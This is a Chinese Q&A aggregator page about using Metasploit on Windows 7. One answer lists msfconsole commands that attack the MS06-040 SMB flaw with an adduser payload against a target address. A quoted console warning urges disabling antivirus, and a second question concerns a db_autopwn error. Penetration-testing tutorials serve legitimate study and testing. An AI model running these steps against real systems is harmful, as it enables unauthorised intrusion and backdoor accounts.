windows7下怎么用metasploit工具

Posted

tags:

篇首语:本文由小常识网(cha138.com)小编为大家整理,主要介绍了windows7下怎么用metasploit工具相关的知识,希望对你有一定的参考价值。

参考技术A 1.安装完后,社区版本无法获得激活key,一不小心,打开了console界面;

2.下面是一次实战

=[ metasploit v4.6.0-dev [core:4.6 api:1.0]
+ -- --=[ 1042 exploits - 640 auxiliary - 176 post
+ -- --=[ 265 payloads - 28 encoders - 8 nops
[-] Warning: This copy of the Metasploit Framework has been corrupted by an installed anti-virus program.
[-] We recommend that you disable your anti-virus or exclude your Metasploit installation path,
[-] then restore the removed files from quarantine or reinstall the framework. For more info:
[-] https://community.rapid7.com/docs/DOC-1273
[-]
[*] Successfully loaded plugin: pro
////////////////////////////////////////////////////////////////知识抄袭/////////////////////////////////////////////////////////////////////////////////////
msf >show exploits
显示MetaSploit目前所能够测试的所有漏洞及相关描述
msf >use windows/smb/ms06_040_netapi
选择MS06_040进行测试
msf>info
显示当前所选漏洞的描述信息
msf>show targets
显示当前所选漏洞能够影响的操作系统
msf>set target 0
设置target 为0,即自动识别Windows2000和WindowsXP系统
msf>show payloads
显示可适合于当前所选漏洞的shellcode
msf>set payload windows/adduser
选用adduser为shellcode
msf>show options
显示当前所选漏洞和shellcode需要配置的选项
msf>set RHOST XX.XX.XX.XX
按照show options的提示设置目标主机地址
msf>set PASS XXXXXXXXXXX
按照show options的提示设置账户密码
msf>set USER XXXXXX
按照show options的提示设置用户名
msf>exploit
进行攻击测试
////////////////////////////////////////////////////////////
注意set的大小写
///////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////

metasploit 下执行 db_autopwn 报错,求救!

Call stack: /opt/metasploit/apps/pro/modules/auxiliary/pro/social_engineering/email_track.rb:24:in `initialize' /usr/share/metasploit-framework/lib/msf/core/module_set.rb:54:in `new' /usr/share/metasploit-framework/lib/msf/core/module_set.rb:54:in `create' /usr/share/metasploit-framework/lib/msf/core/module_set.rb:223:in `block in demand_load_modules' /usr/share/metasploit-framework/lib/msf/core/module_set.rb:220:in `each_pair' /usr/share/metasploit-framework/lib/msf/core/module_set.rb:220:in `demand_load_modules' /usr/share/metasploit-framework/lib/msf/core/module_set.rb:87:in `each_module' /usr/share/metasploit-framework/plugins/db_autopwn.rb:184:in `block in cmd_db_autopwn' /usr/share/metasploit-framework/plugins/db_autopwn.rb:183:in `each' /usr/share/metasploit-framework/plugins/db_autopwn.rb:183:in `cmd_db_autopwn' /usr/share/metasploit-framework/lib/rex/ui/text/dispatcher_shell.rb:427:in `run_command' /usr/share/metasploit-framework/lib/rex/ui/text/dispatcher_shell.rb:389:in `block in run_single' /usr/share/metasploit-framework/lib/rex/ui/text/dispatcher_shell.rb:383:in `each' /usr/share/metasploit-framework/lib/rex/ui/text/dispatcher_shell.rb:383:in `run_single' /usr/share/metasploit-framework/lib/rex/ui/text/shell.rb:200:in `run' /usr/share/metasploit-framework/lib/metasploit/framework/command/console.rb:15:in `start' /usr/share/metasploit-framework/lib/metasploit/framework/command/base.rb:82:in `start' /opt/metasploit/apps/pro/msf3/msfconsole:48:in `<main>'

参考技术A metasploit在4.5就删了db_autopwn你下载个db_autopwn插件
放到插件目录
然后
load
db_autopwn进去

以上是关于windows7下怎么用metasploit工具的主要内容,如果未能解决你的问题,请参考以下文章

windows7下怎么用metasploit工具

如何利用metasploit进行漏洞扫描和攻击

如何给metasploitable2安装桌面

Metasploitable有图形界面吗

怎样更新metasploit中的模块

使用Metasploit渗透攻击Windows7并远程执行命令